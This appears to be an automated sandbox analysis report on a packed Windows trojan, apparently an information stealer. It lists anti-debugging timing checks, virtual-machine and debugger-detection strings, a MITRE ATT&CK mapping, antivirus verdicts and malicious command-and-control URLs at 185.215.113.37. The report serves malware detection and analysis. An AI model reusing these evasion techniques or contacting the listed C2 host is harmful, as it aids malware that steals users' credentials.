                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 147D0A1 second address: 147D0A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 147D0A7 second address: 147D0B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 147D0B0 second address: 147D0BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8F34B47B5Ah 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1492F4E second address: 1492F64 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F8F347F9F16h 0x00000008 jng 00007F8F347F9F16h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1492F64 second address: 1492F70 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 js 00007F8F34B47B56h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1495F47 second address: 1495F4B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 149BE27 second address: 149BE44 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ecx 0x00000006 jp 00007F8F34B47B56h 0x0000000c jmp 00007F8F34B47B5Ch 0x00000011 pop ecx 0x00000012 push eax 0x00000013 push edx 0x00000014 push ebx 0x00000015 pop ebx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 149BE44 second address: 149BE60 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8F347F9F28h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 149BC41 second address: 149BC52 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F8F34B47B56h 0x0000000a push edi 0x0000000b pop edi 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 149D4DB second address: 149D4F0 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push edx 0x00000008 pop edx 0x00000009 jmp 00007F8F347F9F1Bh 0x0000000e popad 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 149D4F0 second address: 149D4FA instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F8F34B47B5Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 149FA4E second address: 149FA52 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 149FA52 second address: 149FA62 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jnc 00007F8F34B47B56h 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14A6356 second address: 14A6360 instructions: 0x00000000 rdtsc 0x00000002 js 00007F8F347F9F1Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14A65F3 second address: 14A65FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14A65FB second address: 14A6601 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14A6601 second address: 14A6605 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14A6605 second address: 14A6621 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8F347F9F28h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14A6B8F second address: 14A6B93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14A6B93 second address: 14A6B9D instructions: 0x00000000 rdtsc 0x00000002 jc 00007F8F347F9F16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14A6B9D second address: 14A6BA5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14AC5FC second address: 14AC614 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 jmp 00007F8F347F9F22h 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14AC78D second address: 14AC7C4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F8F34B47B69h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push edi 0x0000000c jmp 00007F8F34B47B63h 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14AC7C4 second address: 14AC7CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14C41BD second address: 14C41C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 14C41C1 second address: 14C41D8 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F8F347F9F1Fh 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 14D812E second address: 14D8157 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007F8F34B47B5Eh 0x0000000b pushad 0x0000000c popad 0x0000000d jmp 00007F8F34B47B61h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 14D7085 second address: 14D708D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push edx 0x00000007 pop edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 14D7355 second address: 14D7359 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 14D7359 second address: 14D735D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 14D735D second address: 14D7369 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F8F34B47B56h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 14D7369 second address: 14D736F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 14D736F second address: 14D738C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8F34B47B69h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 14D738C second address: 14D7390 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 14D7882 second address: 14D7888 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 14D7E49 second address: 14D7E63 instructions: 0x00000000 rdtsc 0x00000002 je 00007F8F347F9F16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F8F347F9F1Dh 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 14D7E63 second address: 14D7E6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 14D9904 second address: 14D9930 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jns 00007F8F347F9F16h 0x0000000b jc 00007F8F347F9F16h 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F8F347F9F28h 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 14D9930 second address: 14D9942 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8F34B47B5Eh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 14D9774 second address: 14D9778 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 14D9778 second address: 14D977C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 14DD9A1 second address: 14DD9A5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 14DDA85 second address: 14DDABB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8F34B47B68h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F8F34B47B67h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 14DDABB second address: 14DDAC1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 562026B second address: 5620270 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5620270 second address: 56202A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8F347F9F25h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], ebp 0x0000000f pushad 0x00000010 mov edi, eax 0x00000012 mov dh, cl 0x00000014 popad 0x00000015 mov ebp, esp 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a pushad 0x0000001b popad 0x0000001c jmp 00007F8F347F9F1Ah 0x00000021 popad 0x00000022 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 56202A7 second address: 56202B9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8F34B47B5Eh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 56202EA second address: 5620311 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edi 0x00000006 jmp 00007F8F347F9F24h 0x0000000b pop eax 0x0000000c popad 0x0000000d push ebp 0x0000000e pushad 0x0000000f mov si, CAE3h 0x00000013 pushad 0x00000014 mov edx, esi 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5620311 second address: 5620333 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 mov dword ptr [esp], ebp 0x00000009 pushad 0x0000000a jmp 00007F8F34B47B5Ch 0x0000000f push esi 0x00000010 mov eax, edx 0x00000012 pop ebx 0x00000013 popad 0x00000014 mov ebp, esp 0x00000016 pushad 0x00000017 push eax 0x00000018 push edx 0x00000019 mov al, FBh 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5620333 second address: 5620383 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F8F347F9F21h 0x00000008 and si, D746h 0x0000000d jmp 00007F8F347F9F21h 0x00000012 popfd 0x00000013 pop edx 0x00000014 pop eax 0x00000015 push eax 0x00000016 push edx 0x00000017 pushfd 0x00000018 jmp 00007F8F347F9F1Eh 0x0000001d sub ecx, 0A14B3E8h 0x00000023 jmp 00007F8F347F9F1Bh 0x00000028 popfd 0x00000029 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 14056E3 second address: 14056E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 14056E7 second address: 14056ED instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: 13F83A9 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: 13F6B21 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: 125191F instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: 1481F7C instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
                Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
                Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
                Source: all processes | Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01004910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose | 0_2_01004910
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_010038B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose | 0_2_010038B0
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00FFDA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose | 0_2_00FFDA80
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01004570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen | 0_2_01004570
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00FFE430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA | 0_2_00FFE430
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00FFED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose | 0_2_00FFED20
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00FF16D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose | 0_2_00FF16D0
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00FFF6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose | 0_2_00FFF6B0
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00FFBE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose | 0_2_00FFBE70
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00FFDE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose | 0_2_00FFDE10
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01003EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose | 0_2_01003EA0
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00FF1160 GetSystemInfo,ExitProcess | 0_2_00FF1160
                Source: file.exe, file.exe, 00000000.00000002.2168569157.00000000013D9000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                Source: file.exe, 00000000.00000002.2169132039.00000000019EB000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAWM
                Source: file.exe, 00000000.00000002.2169132039.000000000196E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: VMwareVMware>
                Source: file.exe, 00000000.00000002.2169132039.00000000019B1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2169132039.00000000019EB000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
                Source: file.exe, 00000000.00000002.2169132039.000000000196E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: VMwareVMware
                Source: file.exe, 00000000.00000002.2168569157.00000000013D9000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node | graph_0-13414
                Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node | graph_0-13359
                Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node | graph_0-13362
                Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node | graph_0-13382
                Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node | graph_0-13374
                Source: C:\Users\user\Desktop\file.exe | System information queried: ModuleInformation
                Source: C:\Users\user\Desktop\file.exe | Process information queried: ProcessInformation

                Anti Debugging

                Source: C:\Users\user\Desktop\file.exe | Thread information set: HideFromDebugger
                Source: C:\Users\user\Desktop\file.exe | Open window title or class name: regmonclass
                Source: C:\Users\user\Desktop\file.exe | Open window title or class name: gbdyllo
                Source: C:\Users\user\Desktop\file.exe | Open window title or class name: process monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exe | Open window title or class name: procmon_window_class
                Source: C:\Users\user\Desktop\file.exe | Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exe | Open window title or class name: ollydbg
                Source: C:\Users\user\Desktop\file.exe | Open window title or class name: filemonclass
                Source: C:\Users\user\Desktop\file.exe | Open window title or class name: file monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exe | File opened: NTICE
                Source: C:\Users\user\Desktop\file.exe | File opened: SICE
                Source: C:\Users\user\Desktop\file.exe | File opened: SIWVID
                Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
                Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
                Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00FF45C0 VirtualProtect ?,00000004,00000100,00000000 | 0_2_00FF45C0
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01009860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress | 0_2_01009860
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01009750 mov eax, dword ptr fs:[00000030h] | 0_2_01009750
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01007850 GetProcessHeap,RtlAllocateHeap,GetUserNameA | 0_2_01007850
                Source: all processes | Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exe | Memory protected: page guard

                HIPS / PFW / Operating System Protection Evasion

                Source: Yara match | File source: Process Memory Space: file.exe PID: 6200, type: MEMORYSTR
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01009600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle | 0_2_01009600
                Source: file.exe, file.exe, 00000000.00000002.2168569157.00000000013D9000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: MProgram Manager
                Source: C:\Users\user\Desktop\file.exe | Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree | 0_2_01007B90
                Source: C:\Users\user\Desktop\file.exe | Queries volume information: C:\ VolumeInformation
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01006920 GetSystemTime,sscanf,SystemTimeToFileTime,SystemTimeToFileTime,ExitProcess | 0_2_01006920
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01007850 GetProcessHeap,RtlAllocateHeap,GetUserNameA | 0_2_01007850
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01007A30 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA | 0_2_01007A30

                Stealing of Sensitive Information

                Source: Yara match | File source: 0.2.file.exe.ff0000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 00000000.00000003.2128195023.0000000005490000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000000.00000002.2168434293.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara match | File source: 00000000.00000002.2169132039.000000000196E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: Process Memory Space: file.exe PID: 6200, type: MEMORYSTR
                Source: Yara match | File source: dump.pcap, type: PCAP

                Remote Access Functionality

                Source: Yara match | File source: 0.2.file.exe.ff0000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 00000000.00000003.2128195023.0000000005490000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000000.00000002.2168434293.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara match | File source: 00000000.00000002.2169132039.000000000196E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: Process Memory Space: file.exe PID: 6200, type: MEMORYSTR
                Source: Yara match | File source: dump.pcap, type: PCAP

                MITRE ATT&CK Matrix (one line per tactic column; a number in parentheses is the match count the report shows beside that technique, techniques without a number had no match):

                Reconnaissance: Gather Victim Identity Information, Credentials, Email Addresses, Employee Names, Gather Victim Network Information, Domain Properties, DNS, Network Trust Dependencies
                Resource Development: Acquire Infrastructure, Domains, DNS Server, Virtual Private Server, Server, Botnet, Web Services, Serverless
                Initial Access: Valid Accounts, Default Accounts, Domain Accounts, Local Accounts, Cloud Accounts, Replication Through Removable Media, External Remote Services, Drive-by Compromise
                Execution: Command and Scripting Interpreter (2), Native API (11), At, Cron, Launchd, Scheduled Task, Systemd Timers, Container Orchestration Job
                Persistence: DLL Side-Loading (1), Boot or Logon Initialization Scripts, Logon Script (Windows), Login Hook, Network Logon Script, RC Scripts, Startup Items, Scheduled Task/Job
                Privilege Escalation: Process Injection (11), DLL Side-Loading (1), Logon Script (Windows), Login Hook, Network Logon Script, RC Scripts, Startup Items, Scheduled Task/Job
                Defense Evasion: Masquerading (1), Virtualization/Sandbox Evasion (33), Disable or Modify Tools (11), Process Injection (11), Deobfuscate/Decode Files or Information (1), Obfuscated Files or Information (3), Software Packing (12), DLL Side-Loading (1)
                Credential Access: OS Credential Dumping, LSASS Memory, Security Account Manager, NTDS, LSA Secrets, Cached Domain Credentials, DCSync, Proc Filesystem
                Discovery: System Time Discovery (2), Security Software Discovery (641), Virtualization/Sandbox Evasion (33), Process Discovery (13), Account Discovery (1), System Owner/User Discovery (1), File and Directory Discovery (1), System Information Discovery (324)
                Lateral Movement: Remote Services, Remote Desktop Protocol, SMB/Windows Admin Shares, Distributed Component Object Model, SSH, VNC, Windows Remote Management, Cloud Services
                Collection: Archive Collected Data (1), Data from Removable Media, Data from Network Shared Drive, Input Capture, Keylogging, GUI Input Capture, Web Portal Capture, Credential API Hooking
                Command and Control: Encrypted Channel (2), Ingress Tool Transfer (2), Non-Application Layer Protocol (2), Application Layer Protocol (12), Fallback Channels, Multiband Communication, Commonly Used Port, Application Layer Protocol
                Exfiltration: Exfiltration Over Other Network Medium, Exfiltration Over Bluetooth, Automated Exfiltration, Traffic Duplication, Scheduled Transfer, Data Transfer Size Limits, Exfiltration Over C2 Channel, Exfiltration Over Alternative Protocol
                Impact: Abuse Accessibility Features, Network Denial of Service, Data Encrypted for Impact, Data Destruction, Data Encrypted for Impact, Service Stop, Inhibit System Recovery, Defacement


                            Source | Detection | Scanner | Label
                            file.exe | 50% | ReversingLabs | Win32.Trojan.Generic
                            file.exe | 100% | Avira | TR/Crypt.TPM.Gen
                            file.exe | 100% | Joe Sandbox ML |
                No Antivirus matches
                No Antivirus matches
                No Antivirus matches
                            Source | Detection | Scanner | Label
                            http://185.215.113.37/ | 100% | URL Reputation | malware
                            http://185.215.113.37 | 100% | URL Reputation | malware
                            http://185.215.113.37/e2b1563c6670f193.php | 100% | URL Reputation | malware
                No contacted domains info
                            Name | Malicious | Antivirus Detection | Reputation
                            http://185.215.113.37/ | true | URL Reputation: malware | unknown
                            http://185.215.113.37/e2b1563c6670f193.php | true | URL Reputation: malware | unknown
                            Name | Source | Malicious | Antivirus Detection | Reputation
                            http://185.215.113.37 | file.exe, 00000000.00000002.2169132039.000000000196E000.00000004.00000020.00020000.00000000.sdmp | true | URL Reputation: malware | unknown
